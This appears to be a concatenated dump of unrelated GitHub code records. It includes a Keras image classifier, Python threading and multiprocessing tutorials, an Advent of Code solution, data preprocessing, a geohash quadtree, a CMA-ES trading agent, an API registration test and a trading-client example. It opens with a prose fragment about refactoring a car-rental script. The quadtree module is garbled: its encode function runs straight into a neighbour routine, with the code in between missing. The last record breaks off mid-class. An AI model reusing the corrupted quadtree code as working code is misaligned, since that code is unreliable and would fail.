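The rental script above repeats the prompt/if-elif block verbatim for the second rental; a loop removes the duplication. A sketch under that assumption (the prompt strings are translated from Czech for illustration; the original identifiers are kept, and `volba` is a new illustrative name):

for _ in range(2):
    volba = input("Which vehicle would you like to rent? We offer Peugeot and Skoda: ")
    if volba == "Škoda":
        auto_skoda.pujc_auto()
        auto_skoda.getInfo()
    elif volba == "Peugeot":
        auto_peugeut.pujc_auto()
        auto_peugeut.getInfo()
    else:
        print("Please pick another car.")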
test_utils.unordered_compare))\n","repo_name":"akimi-yano/EPIJudge","sub_path":"epi_judge_python/k_largest_values_in_bst.py","file_name":"k_largest_values_in_bst.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71259636853","text":"#from imagetoarraypreprrocessor import ImagetOArrayPreproessor\n#from simplepreprocessor import SimplePreprocessor\n#from simpledatasetloader import SimpleDatasetLoader\nfrom keras.models import load_model\nfrom imutils import paths\nimport numpy as np\nimport argparse\nimport cv2\nfrom keras.preprocessing.image import img_to_array\n\nap=argparse.ArgumentParser()\nap.add_argument(\"-i\",\"--image\",required=True,help=\"path to image to be predicted\")\nap.add_argument(\"-m\",\"--model\",required=True,help=\"path to load model\")\nargs=vars(ap.parse_args())\n\ndata=[]\nlabels=[\"bullettrain\",\"dugong\",\"elephant\",\"espresso\",\"lemon\",\"lion\",\"penguin\",\"potterwheel\",\"schoolbus\",\"steelarchbridge\",\"watertower\"]\nimage=cv2.imread(args[\"image\"])\ncv2.imshow(\"zx\",image)\ncv2.waitKey(0)\nimage=cv2.resize(image,(32,32),interpolation=cv2.INTER_AREA)\n\n\ndata.append(img_to_array(image,data_format=None))\ndata=np.array(data)\ndata=data.astype(\"float\")/255.0\n\nprint(\"[INFO] loading pre-trained network...\")\t\t\nmodel=load_model(args[\"model\"])\n\npred=model.predict(data,batch_size=1)\nprint(pred)\nprint(max(max(pred)))\n","repo_name":"Chinmay-20/Classification-of-simple-classes-in-Tiny-ImageNet-200","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
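testing.py prints the raw prediction vector and its maximum; mapping the winning index back to the labels list is usually more useful. A small addition using the pred and labels already defined above:

idx = int(np.argmax(pred[0]))
print(f"predicted class: {labels[idx]} (confidence {pred[0][idx]:.3f})")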
+{"seq_id":"19980669330","text":"\n# coding: utf-8\n\n# In[12]:\n\n\nimport multiprocessing as mp\n\ndef job(q):\n    res = 0\n    for i in range(1000):\n        res += i + i**2 + i**3\n    q.put(res) # queue\n\n\nif __name__=='__main__':\n    q = mp.Queue()\n    p1 = mp.Process(target=job,args=(q,))\n    p2 = mp.Process(target=job,args=(q,))\n    p1.start()\n    p2.start()\n    p1.join()\n    p2.join()\n    res1 = q.get()\n    res2 = q.get()\n    print(res1 + res2)\n\n\n# In[ ]:\n\n\nimport multiprocessing as mp\n\n# shared memory\nvalue = mp.Value('d', 1)\narray = mp.Array('i', [1, 2, 3])\n\n\n# In[5]:\n\n\nimport multiprocessing as mp\nimport time\ndef job(v, num, l):\n    l.acquire() # acquire the lock\n    for _ in range(5):\n        time.sleep(0.1) \n        v.value += num # update the shared value\n        print(v.value)\n    l.release() # release the lock\n\ndef multicore():\n    l = mp.Lock() # create a process lock\n    v = mp.Value('i', 0) # define shared memory\n    p1 = mp.Process(target=job, args=(v,1,l)) # the lock must be passed in\n    p2 = mp.Process(target=job, args=(v,3,l)) \n    p1.start()\n    p2.start()\n    p1.join()\n    p2.join()\n\nif __name__ == '__main__':\n    multicore()\n\n\n# In[10]:\n\n\nimport threading\n\ndef thread_job():\n    print(\"This is an added Thread, number is %s\"% threading.current_thread())\n    \ndef main():\n    added_thread = threading.Thread(target = thread_job)\n    added_thread.start()\n#     print(threading.active_count())\n#     print(threading.enumerate())\n#     print(threading.current_thread())\n    \nif __name__ == '__main__':\n    main()\n\n\n# In[15]:\n\n\n# multithreading\nimport threading\nimport time\n\ndef thread_job():\n    print(\"T1 start\\n\")\n    for i in range(10):\n        time.sleep(0.1)\n    print(\"T1 finish \\n\")\n    \ndef thread_job2():\n    print(\"T2 start\\n\")\n    print(\"T2 finish \\n\")\ndef main():\n    added_thread = threading.Thread(target = thread_job, name = \"T1\")\n    thread2 = threading.Thread(target = thread_job2, name = \"T2\" )\n    added_thread.start()\n    thread2.start()\n    added_thread.join()\n    thread2.join()\n    print(\"all done\\n\")\n    \n#     print(threading.active_count())\n#     print(threading.enumerate())\n#     print(threading.current_thread())\n    \nif __name__ == '__main__':\n    main()\n\n\n# In[ ]:\n\n\nimport threading\nimport time\n\nfrom queue import Queue\n\ndef job(l,q):\n    for i in range (len(l)):\n        l[i] = l[i]**2\n    q.put(l)\n\ndef multithreading():\n    q =Queue()\n    threads = []\n    data = [[1,2,3],[3,4,5],[4,4,4],[5,5,5]]\n    for i in range(4):\n        t = threading.Thread(target=job,args=(data[i],q))\n        t.start()\n        threads.append(t)\n    for thread in threads:\n        thread.join()\n    results = []\n    for _ in range(4):\n        results.append(q.get())\n    print(results)\n\nif __name__=='__main__':\n    multithreading()\n\n\n# In[1]:\n\n\nimport threading\nfrom queue import Queue\nimport copy\nimport time\n\ndef job(l, q):\n    res = sum(l)\n    q.put(res)\n\ndef multithreading(l):\n    q = Queue()\n    threads = []\n    for i in range(4):\n        t = threading.Thread(target=job, args=(copy.copy(l), q), name='T%i' % i)\n        t.start()\n        threads.append(t)\n    [t.join() for t in threads]\n    total = 0\n    for _ in range(4):\n        total += q.get()\n    print(total)\n\ndef normal(l):\n    total = sum(l)\n    print(total)\n\nif __name__ == '__main__':\n    l = list(range(1000000))\n    s_t = time.time()\n    normal(l*4)\n    print('normal: ',time.time()-s_t)\n    s_t = time.time()\n    multithreading(l)\n    print('multithreading: ', time.time()-s_t)\n\n\n# In[ ]:\n\n\nimport threading\n\ndef job1():\n    global A,lock\n    lock.acquire()\n    for i in range(10):\n        A+=1\n        print('job1',A)\n    lock.release()\n\ndef job2():\n    global A,lock\n    lock.acquire()\n    for i in range(10):\n        A+=10\n        print('job2',A)\n    lock.release()\n\nif __name__== '__main__':\n    lock=threading.Lock()\n    A=0\n    t1=threading.Thread(target=job1)\n    t2=threading.Thread(target=job2)\n    t1.start()\n    t2.start()\n    t1.join()\n    t2.join()\n","repo_name":"Koala111/Python","sub_path":"progress/Thread.py","file_name":"Thread.py","file_ext":"py","file_size_in_byte":3864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5611332325","text":"from aocd.models import Puzzle\n\n\ndef travel(data):\n    # start at origin\n    x = 0\n    y = 0\n\n    # define a set of houses, seeded with the origin house\n    houses = {(x, y)}\n\n    # go through each direction\n    for d in data:\n        if d == \"^\":\n            y += 1\n        elif d == \"v\":\n            y -= 1\n        elif d == \">\":\n            x += 1\n        elif d == \"<\":\n            x -= 1\n\n        # add the new house to the set\n        houses.add((x, y))\n\n    return houses\n\n\ndef part1(data):\n    # check the length of the set of houses\n    return len(travel(data))\n\n\ndef part2(data):\n\n    # split data into santa and robot santa directions\n    santa = data[0::2]\n    robot_santa = data[1::2]\n\n    # get the set of houses for each\n    santa_houses = travel(santa)\n    robot_santa_houses = travel(robot_santa)\n\n    # return the length of the union of the two sets\n    return len(santa_houses.union(robot_santa_houses))\n\n\nif __name__ == \"__main__\":\n\n    # import unique puzzle data\n    puzzle = Puzzle(2015, 3)\n    raw = puzzle.input_data\n\n    answer1 = part1(raw)\n    answer2 = part2(raw)\n\n    print(f\"Part 1: {answer1}\")\n    print(f\"Part 2: {answer2}\")\n","repo_name":"anissa111/advent-of-code","sub_path":"2015/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"35247710703","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\nimport os\n\n\nclass Preprocess:\n\n    # 整理后版本\n\n    @staticmethod\n    def 
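The direction dispatch in day3's travel() can also be table-driven, which keeps the walk itself to two lines. A sketch of an equivalent implementation:

MOVES = {"^": (0, 1), "v": (0, -1), ">": (1, 0), "<": (-1, 0)}

def travel(data):
    x = y = 0
    houses = {(0, 0)}
    for d in data:
        dx, dy = MOVES.get(d, (0, 0))
        x, y = x + dx, y + dy
        houses.add((x, y))
    return houses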
extract_data(train_dir, test_dir, yoochoose_data_dir, yoochoose_selected_dir, setting=0):\n\n # 提取分类实验数据集\n\n # 输入数据路径(注意:这里用于训练和测试的session_item.txt数据都来源于原始数据中的训练集点击和购买数据)\n train_session_path = train_dir + r'\\session_item.txt'\n test_session_path = test_dir + r'\\session_item.txt'\n\n # 输入路径\n # early predict-截断数据setting设置为1,非截断数据设置为0。\n # early predict-注意这里截断数据和非截断数据的yoochoose_data_dir不同\n if setting == 1:\n # 截断数据的点击数据是到第一个购买商品时截断的。\n clicks_path = yoochoose_data_dir + r'\\yoochoose-clicks-selected.dat'\n buys_path = yoochoose_data_dir + r'\\yoochoose-buys-selected.dat'\n else:\n clicks_path = yoochoose_data_dir + r'\\yoochoose-clicks.dat'\n buys_path = yoochoose_data_dir + r'\\yoochoose-buys.dat'\n\n # 输出路径\n clicks_selected_path = yoochoose_selected_dir + r'\\yoochoose-clicks-selected.dat'\n buys_selected_path = yoochoose_selected_dir + r'\\yoochoose-buys-selected.dat'\n # (注意:这里yoochoose-test-selected.dat文件的数据并非来源于yoochoose-test.dat文件,而是来源于yoochoose-clicks.dat\n # 和yoochoose-buys.dat文件,因为用于测试的session_item.txt数据也来源于原始数据中的训练集点击和购买数据)\n test_selected_path = yoochoose_selected_dir + r'\\yoochoose-test-selected.dat'\n\n # 提取实验数据session\n train_session = set()\n extract_session(train_session_path, train_session)\n test_session = set()\n extract_session(test_session_path, test_session)\n\n # 根据实验数据session进行提取yoochoose-data-selected\n extract_and_print_data(clicks_path, train_session, clicks_selected_path)\n extract_and_print_data(buys_path, train_session, buys_selected_path)\n # 加了下面这个判断\n # 注意截断数据测试数据的点击数据和非截断数据的应是一样的,即都是非截断的。\n # 若是截断数据,setting = 1\n if setting == 1:\n clicks_path = r\"E:\\ranking aggregation\\dataset\\yoochoose\\Full\" + r'\\yoochoose-clicks.dat'\n extract_and_print_data(clicks_path, test_session, test_selected_path)\n\n\ndef extract_session(file_path, session):\n file = open(file_path)\n try:\n for line in file:\n tmp = line.split(\";\")\n session_str = tmp[0]\n session.add(session_str)\n except Exception as e:\n print(e)\n finally:\n file.close()\n\n\n# 从点击数据文件中选出样本数据session中的点击数据并输出\ndef extract_and_print_data(in_file_path, session, out_file_path):\n in_file = open(in_file_path)\n out_file = open(out_file_path, 'w')\n try:\n for line in in_file:\n tmp = line.split(',')\n session_str = tmp[0]\n if session_str in session:\n out_file.write(line)\n except Exception as e:\n print(e)\n finally:\n in_file.close()\n out_file.close()\n\n\nif __name__ == '__main__':\n\n # 提取Full/extracted中session_item.txt中的session对应的yoochoose-clicks.dat和yoochoose-buys.dat\n main_dir = r'E:\\ranking aggregation\\dataset\\yoochoose\\Full'\n dataset_para = 'extracted'\n # 文件夹路径\n dataset_dir = main_dir + '\\\\' + dataset_para\n yoochoose_data_dir = main_dir\n # 输出文件夹路径\n yoochoose_selected_dir = dataset_dir + r'\\yoochoose-selected'\n # 文件路径\n RA_train_session_path = dataset_dir + r'\\session_item.txt'\n # 输入文件路径\n clicks_path = yoochoose_data_dir + r'\\yoochoose-clicks.dat'\n buys_path = yoochoose_data_dir + r'\\yoochoose-buys.dat'\n # 输出文件路径\n clicks_selected_path = yoochoose_selected_dir + r'\\yoochoose-clicks-selected.dat'\n buys_selected_path = yoochoose_selected_dir + r'\\yoochoose-buys-selected.dat'\n # 假如输出文件夹不存在,则创建文件夹\n if not os.path.exists(yoochoose_selected_dir):\n os.makedirs(yoochoose_selected_dir)\n\n # 提取实验数据session\n train_session = set()\n extract_session(RA_train_session_path, train_session)\n\n # 根据实验数据session进行提取yoochoose-data-selected\n extract_and_print_data(clicks_path, train_session, clicks_selected_path)\n extract_and_print_data(buys_path, train_session, 
buys_selected_path)\n","repo_name":"CaiMugino/RLSO","sub_path":"rlso/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":4723,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35454597","text":"import os\n\nimport pygame\n\n\nASSETS_ROOT = os.path.join('assets', 'experiments', 'spaceArt', 'png')\nLOGO_FILE = os.path.join(ASSETS_ROOT, 'life.png')\n\nTEST_IMAGE = os.path.join(ASSETS_ROOT, 'laserRedShot.png')\n\nHEIGHT = 1080\nWIDTH = 1920\n\ndef main():\n pygame.init()\n logo = pygame.image.load(LOGO_FILE)\n pygame.display.set_icon(logo)\n pygame.display.set_caption(\"Test program\")\n\n screen = pygame.display.set_mode((WIDTH, HEIGHT))\n image = pygame.image.load(TEST_IMAGE)\n x = 0\n y = 0\n x_mul = 1\n y_mul = 1\n\n running = True\n index = 0\n\n while running:\n for event in pygame.event.get():\n screen.blit(image, (x, y))\n pygame.display.flip()\n\n x += x_mul\n y += y_mul\n\n if x == WIDTH - 1 or x == 0:\n x_mul *= -1\n if y == HEIGHT - 1 or y == 0:\n y_mul *= -1\n if event.type == pygame.QUIT:\n running = False\n elif event.type == pygame.KEYDOWN:\n print(event.key)\n print(\"{0}: You pressed {1:c}\".format(index, event.key))\n elif event.type == pygame.KEYUP:\n print(\"{0}: You released {1:c}\".format(index, event.key))\n index += 1\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"tudorvaran/university","sub_path":"vgd/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"16258774653","text":"# coding: UTF-8\r\n\"\"\"\r\nCopyright (C) 2009 Hiroaki Kawai \r\n\"\"\"\r\ntry:\r\n\timport _geohash\r\nexcept ImportError:\r\n\t_geohash = None\r\n\r\ndef _encode_i2c(lat,lon,bitlength):\r\n\tdigits='0123'\r\n\tr = ''\r\n\twhile bitlength>0:\r\n\t\tr += digits[((lat&1)<<1)+(lon&1)]\r\n\t\tlat = lat>>1\r\n\t\tlon = lon>>1\r\n\t\tbitlength -= 1\r\n\t\r\n\treturn r[::-1]\r\n\r\ndef _decode_c2i(treecode):\r\n\tlat = 0\r\n\tlon = 0\r\n\tfor i in treecode:\r\n\t\tb = ord(i)-48\r\n\t\tlat = (lat<<1)+int(b/2)\r\n\t\tlon = (lon<<1)+b%2\r\n\t\r\n\treturn (lat,lon,len(treecode))\r\n\r\ndef encode(lat,lon,precision=12):\r\n\tif _geohash and precision<=64:\r\n\t\tints = _geohash.encode_int(lat, lon)\r\n\t\tret = \"\"\r\n\t\tfor intu in ints:\r\n\t\t\tfor i in range(int(_geohash.intunit/2)):\r\n\t\t\t\tif len(ret) > precision:\r\n\t\t\t\t\tbreak\r\n\t\t\t\tret += \"0213\"[(intu>>(_geohash.intunit-2-i*2))&0x03]\r\n\t\t\r\n\t\treturn ret[:precision]\r\n\t\r\n\tb = 1<>bitlength:\r\n\t\tfor tlon in (lon-1, lon, lon+1):\r\n\t\t\tr.append(_encode_i2c(tlat, tlon, bitlength))\r\n\t\r\n\ttlat = lat-1\r\n\tif tlat>=0:\r\n\t\tfor tlon in (lon-1, lon, lon+1):\r\n\t\t\tr.append(_encode_i2c(tlat, tlon, bitlength))\r\n\t\r\n\treturn r\r\n\r\ndef expand(treecode):\r\n\tr = neighbors(treecode)\r\n\tr.append(treecode)\r\n\treturn r\r\n\r\n","repo_name":"fleetdm/fleet","sub_path":"infrastructure/sandbox/Data/lambda/quadtree.py","file_name":"quadtree.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":1714,"dataset":"github-code","pt":"21"} +{"seq_id":"12798003486","text":"import numpy as np\nimport random\nimport cma\nimport json\nimport copy\nimport math\nimport sys\nimport os\n\nfrom simulation.SnetAgent import SnetAgent\n\n\nclass SISTER(SnetAgent):\n def __init__(self, unique_id, model, message, parameters):\n super().__init__(unique_id, model, 
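The quadtree record above appears truncated between encode() and the neighbour helpers (the jump from `b = 1<` to `>>bitlength:`), so that gap is left as-is rather than guessed at. The integer helpers that did survive round-trip cleanly; a small check of _encode_i2c/_decode_c2i as defined in the record:

lat_i, lon_i, bits = 5, 9, 4
code = _encode_i2c(lat_i, lon_i, bits)
print(code)               # '1203'
print(_decode_c2i(code))  # (5, 9, 4) — the original cell coordinates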
message, parameters)\n\n # SISTER uses CMA-ES on float vectors, that are then converted\n # to trade plans. If an initial message is put on the board,\n # this is converted to a floatvec, and is used to initialize cma-es\n\n vs = self.vector_size()\n self.initialVec = np.random.uniform(low=0.0, high=1.0, size=(vs,))\n if not message:\n self.message, float_vec = self.float_vec_to_trade_plan(self.initialVec)\n self.initial_trade_plan = None\n else:\n\n self.initial_trade_plan = copy.deepcopy(self.message)\n mask = copy.deepcopy(self.initial_trade_plan)\n self.message, float_vec = self.float_vec_to_trade_plan(self.initialVec, mask)\n\n self.float_vec = float_vec\n self.model.blackboard.append(self.message)\n\n seed = random.randint(1,1000000)\n params = {'bounds': [0.0, 1.0], 'seed': seed, 'CMA_elitist': self.parameters['elitist']}\n self.es = cma.CMAEvolutionStrategy(self.initialVec, self.parameters['sigma'], params )\n self.solutions = self.es.ask()\n self.results = []\n self.next_solution = 0\n\n self.agiTokens = 0\n self.max_buyer_score = 0\n self.max_seller_score = 0\n\n print (\"IN SISTER init,\"+self.b[self.unique_id]['label'])\n\n\n\n def step(self):\n\n print(\"IN SISTER step,\"+self.b[self.unique_id]['label']+ \" time \"+ str(self.model.schedule.time))\n # print(self.b[self.unique_id]['label'] + ' in step')\n\n # append put the cumulative token reward as the reward for the last solution\n result = self.agiTokens * self.parameters['fitness_weights']['agi_tokens'] \\\n + self.max_buyer_score * self.parameters['fitness_weights']['buyer_score'] \\\n + self.max_seller_score * self.parameters['fitness_weights']['seller_score']\n\n bought_items = self.get_bought_items()\n self.results.append(result)\n self.model.print_reproduction_report_line(self,result, bought_items)\n\n\n # move a cursor that tells which solution you are on.\n # if there are none left, tell then ask, clearing reward buffer, resettinng cursor\n # take the next solutions and put the message on the blackboard\n self.next_solution += 1\n if self.next_solution >= len(self.solutions):\n #Checkpoints as false enables the cma-es to accept the fixed solution seeds (partially fixed solutions)\n # that are set parts of the space to evolve around\n self.es.tell(self.solutions, self.results, check_points=False)\n self.results= []\n self.next_solution = 0\n self.solutions = self.es.ask()\n\n\n mask = None\n if self.initial_trade_plan:\n step = math.floor(self.model.schedule.time)\n initial_message = self.initial_trade_plan['initial_message'] \\\n if 'initial_message' in self.initial_trade_plan else 0\n final_message = self.initial_trade_plan['final_message'] \\\n if 'final_message' in self.initial_trade_plan else sys.maxsize\n message_period = self.initial_trade_plan['message_period'] \\\n if 'message_period' in self.initial_trade_plan else 1\n\n if step >= initial_message and step <= final_message and step % message_period == 0:\n mask = copy.deepcopy(self.initial_trade_plan)\n\n new_message, float_vec = self.float_vec_to_trade_plan(self.solutions[self.next_solution],mask)\n\n\n\n self.agiTokens = 0\n self.max_buyer_score = 0\n self.max_seller_score = 0\n self.set_message(new_message)\n self.float_vec = float_vec\n\n\n def buyer_score_notification(self, score, tradenum):\n #print(self.b[self.unique_id]['label'] + ' wealth changes by ' + agiTokens + ' because of trade ' + str(tradenum))\n if self.max_buyer_score < score:\n self.max_buyer_score = score\n\n def seller_score_notification(self, score, tradenum):\n 
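SISTER drives pycma through the ask/tell interface shown above. A minimal standalone sketch of that loop on a toy objective follows; note that CMA-ES minimizes its fitness values, so a reward-style score like SISTER's would normally be negated before being passed to tell:

import cma

es = cma.CMAEvolutionStrategy([0.5] * 10, 0.3, {'bounds': [0.0, 1.0]})
while not es.stop():
    solutions = es.ask()
    fitnesses = [sum((x - 0.25) ** 2) for x in solutions]  # toy objective to minimize
    es.tell(solutions, fitnesses)
print(es.result.xbest)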
#print(self.b[self.unique_id]['label'] + ' wealth changes by ' + agiTokens + ' because of trade ' + str(tradenum))\n if self.max_seller_score < score:\n self.max_seller_score = score\n\n def payment_notification(self, agiTokens, tradenum):\n #print(self.b[self.unique_id]['label'] + ' wealth changes by ' + agiTokens + ' because of trade ' + str(tradenum))\n self.agiTokens += agiTokens","repo_name":"singnet/simulation","sub_path":"simulation/SISTER.py","file_name":"SISTER.py","file_ext":"py","file_size_in_byte":4702,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"21"} +{"seq_id":"4805973312","text":"# Author:zqbin\n# @Time:2023/9/26 14:07\n# @Author:14988\n# @Site:\n# @File:test_register.py\n# @Software:PyCharm\nimport unittest\nfrom lib.mysql_client import MySQLClient\nfrom lib.logger import Logger\nfrom lib.http_client import HTTPClient\nfrom jsonpath import jsonpath\n\n\nclass TestRegister01(unittest.TestCase):\n __logger = Logger()\n __httpclient = HTTPClient()\n\n @classmethod\n def setUp(cls) -> None:\n cls.__logger.info(\"开始执行测试用例--注册接口\")\n client = MySQLClient()\n sql1 = 'delete from auth_user where username=\"test926_901\"'\n sql2 = 'delete from user_profile where name=\"test926_901\"'\n client.execute([sql1, sql2])\n\n @classmethod\n def tearDown(cls) -> None:\n client = MySQLClient()\n sql1 = 'delete from auth_user where username=\"test926_901\"'\n sql2 = 'delete from user_profile where name=\"test926_901\"'\n client.execute([sql1, sql2])\n cls.__logger.info(\"结束执行测试用例--注册接口\")\n\n def test_method(self):\n method = \"post\"\n data = {\n \"name\": \"test926_901\",\n \"password1\": \"123456\",\n \"password2\": \"123456\"\n }\n r = self.__httpclient.request('/register/', method=method, json=data)\n\n expectValue = 200\n currentValue = r.status_code\n self.assertEqual(expectValue, currentValue)\n\n expectValue = '200'\n # currentValue = r.json()['code']\n currentValue = jsonpath(r.json(), '$..code')[0]\n # TestRegister01.__logger.info(f'currentValue={currentValue}')\n self.assertEqual(expectValue, currentValue)\n\n expectValue = 1\n client = MySQLClient()\n sql1 = 'select * from auth_user where username=\"test926_901\"'\n sql2 = 'select * from user_profile where name=\"test926_901\"'\n retList = client.execute([sql1, sql2])\n currentValue = retList[0]\n self.assertEqual(expectValue, currentValue)\n currentValue = retList[1]\n self.assertEqual(expectValue, currentValue)\n","repo_name":"FoXM999/ceniu","sub_path":"api_test/testcase/test_register.py","file_name":"test_register.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73706420854","text":"import os\nimport re\nfrom flask import Flask, jsonify, render_template, request, url_for\nfrom flask_jsglue import JSGlue\n\nfrom cs50 import SQL\n\n\n# configure application\napp = Flask(__name__)\nJSGlue(app)\n\n\nif app.config[\"DEBUG\"]:\n @app.after_request\n def after_request(response):\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n response.headers[\"Expires\"] = 0\n response.headers[\"Pragma\"] = \"no-cache\"\n return response\n\n\n\n\n\n\n\n\n\n@app.route(\"/\")\ndef index():\n \"\"\"Render map.\"\"\"\n if not os.environ.get(\"API_KEY\"):\n raise RuntimeError(\"API_KEY not set\")\n return render_template(\"index.html\", 
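test_register.py defines a TestCase but no entry point; adding the standard guard lets the module run directly as well as through discovery. A sketch:

if __name__ == '__main__':
    unittest.main(verbosity=2)

# or, from the project root:
#   python -m unittest api_test.testcase.test_register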
key=os.environ.get(\"API_KEY\"))","repo_name":"bhuvanchopra/cs50","sub_path":"bhuvanchopra-cs50-2017-x-project/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28303846832","text":"from picorobotics import PicoRobotics\nimport utime\nfrom client import client_pico\n\nboard = PicoRobotics.KitronikPicoRobotics()\ndirections = [\"f\",\"r\"]\n\ndef test():\n while True:\n for direction in directions:\n for stepcount in range(200):\n board.step(1,direction,8)\n board.step(2,direction,8)\n utime.sleep_ms(500)#pause between motors\n\n\n\n\nif __name__ == '__main__':\n pos_start = {'az': 0.0,\n 'alt': 0.0\n }\n pos_crnt = pos_start\n\n az_last = 0\n alt_last = 0\n\n\n\n while True:\n data = client_pico.main()\n az = data[0]\n alt = data[2]\n\n az_delta = az + az_last\n alt_delta = alt + alt_last\n\n board.stepAngle(1,1,alt_delta,holdPosition=True)\n\n\n\n\n\n\n\n","repo_name":"albioninnovate/Pointer","sub_path":"picorobotics/main_Stepper.py","file_name":"main_Stepper.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27618012597","text":"from datetime import datetime\nimport pytz\nfrom django.conf import settings\nfrom django.db.models import QuerySet\n\n\nclass MessageQuerySet(QuerySet):\n def create_message(self, data, chat, type):\n type = type or self.model.TYPE_TEXT\n \"\"\" Creates botmother Messages \"\"\"\n tz = pytz.timezone(settings.TIME_ZONE)\n date = datetime.utcfromtimestamp(data.get('date')).replace(tzinfo=tz) if data.get('date') else datetime.now()\n message = self.model(\n chat=chat,\n id=data.get('message_id') or data.get('id'),\n text=data['text'],\n date=date,\n type=type,\n )\n # message.save()\n\n return message\n","repo_name":"mondaylabs/botmother","sub_path":"botmother/querysets/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"24250697322","text":"# -*- coding: utf-8 -*-\n\nfrom functools import wraps\n\n\ndef call_once(func):\n store = {\n \"has_run\": False,\n \"return\": None,\n }\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n if not store[\"has_run\"]:\n store[\"has_run\"] = True\n store[\"return\"] = func(*args, **kwargs)\n return store[\"return\"]\n return wrapper\n","repo_name":"cfeitong/chat-bot","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36379923455","text":"a=str(input().strip())\r\nmid=len(a)//2\r\nm,k=[],mid+1\r\nfor i in range(mid):\r\n m.append(\" \"*(i)+a[i]+\" \"*(len(a)-k)+a[-(i+1)]+\" \"*(i))\r\n k+=1\r\nfor x in m:\r\n print(x)\r\nprint(\" \"*(mid//2)+a[mid]+\" \"*(mid//2))\r\nfor x in m[::-1]:\r\n print(x)","repo_name":"surya-parthipan/Practice","sub_path":"string_manip.py","file_name":"string_manip.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16731216668","text":"import time\nimport uuid\n\nfrom omega_client.communication.single_client_omega_connection import \\\n configure_single_client_omega_connection\nfrom omega_client.messaging.common_types import (AccountCredentials,\n AccountInfo, LeverageType, Order, 
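The call_once decorator above caches the first return value and suppresses later calls' side effects; a short usage demonstration:

@call_once
def load_config():
    print("loading config...")  # this side effect runs exactly once
    return {"debug": True}

print(load_config())  # prints "loading config..." then {'debug': True}
print(load_config())  # returns the cached dict without re-running the body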
OrderType, Side, TimeInForce)\nfrom omega_client.messaging.printing_response_handler import \\\n PrintingResponseHandler\n\nOMEGA_ENDPOINT = \"tcp://0.0.0.0:9999\"\nOMEGA_SERVER_KEY = \"omega_server_key\"\n\n\ndef main():\n client_id = 1\n sender_comp_id = str(uuid.uuid4())\n omega_connection = configure_single_client_omega_connection(\n OMEGA_ENDPOINT,\n OMEGA_SERVER_KEY,\n client_id,\n sender_comp_id,\n PrintingResponseHandler())\n\n omega_connection.start()\n omega_connection.wait_until_running()\n\n account_id = 2\n api_key = \"api_key\"\n secret_key = \"secret_key\"\n passphrase = \"passphrase\"\n credentials = AccountCredentials(AccountInfo(account_id), api_key,\n secret_key, passphrase)\n\n omega_connection.logon([credentials])\n omega_connection.send_heartbeat()\n order = Order(\n account_info=AccountInfo(account_id=account_id),\n # ID generated by client to keep track of the order\n client_order_id=str(123),\n client_order_link_id='test', # A str to identify and group orders\n symbol='ETH/USD',\n side=Side.sell.name,\n order_type=OrderType.market.name, # Optional param\n quantity=1.1,\n price=0.0,\n time_in_force=TimeInForce.gtc.name,\n leverage_type=LeverageType.none.name\n )\n omega_connection.place_order(order)\n time.sleep(2)\n omega_connection.logoff()\n time.sleep(2)\n omega_connection.cleanup()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"fund3/python_omega_client","sub_path":"omega_client/examples/place_order.py","file_name":"place_order.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28005574254","text":"import os\nimport subprocess\nimport datetime as dt\nimport pathlib\nimport tarfile\nimport shutil\nimport time\nimport yaml\nimport json\nfrom random import randint\nimport inspect\nimport re\nimport glob\n\nimport fv3jeditools.Config.gfs_conf as modconf\nimport fv3jeditools.Utils.utils as utils\n\n__all__ = ['GFS']\n\n# --------------------------------------------------------------------------------------------------\n\n\nclass GFS:\n\n def __init__(self):\n\n # Initialize\n\n self.myName = 'gfs' # Name for this model\n self.hpssRoot = '/NCEPPROD/hpssprod/runhistory/' # Path to archived files\n # Number of ensemble groups per cycle\n self.nGrps = 8\n self.nEns = 80 # Number of ensemble members\n self.stageDir = 'stageGFS'\n self.nRstFiles = 38\n self.nEnsPerGrp = int(self.nEns/self.nGrps)\n\n self.nProcNx = '4' # Number of processors on cube face, x direction\n self.nProcNy = '4' # Number of processors on cube face, y direction\n\n # Horizontal resolution, e.g. 
